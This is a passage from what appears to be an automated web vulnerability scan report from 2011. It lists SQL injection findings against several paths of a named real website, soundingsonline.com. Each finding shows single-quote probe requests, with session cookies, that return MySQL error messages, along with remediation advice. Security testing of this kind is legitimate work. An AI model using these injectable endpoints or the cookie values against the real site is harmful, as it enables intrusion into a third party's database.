Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-boats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.143. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-gear?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-gear?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.144. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-powerboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-powerboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.145. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-sailboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-sailboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.146. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/q-a-a?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/q-a-a?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.147. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/sea-savvy?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/sea-savvy?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.148. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/tech-talk?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/tech-talk?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.149. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/used-boat-review?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/used-boat-review?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.150. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /calendar?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

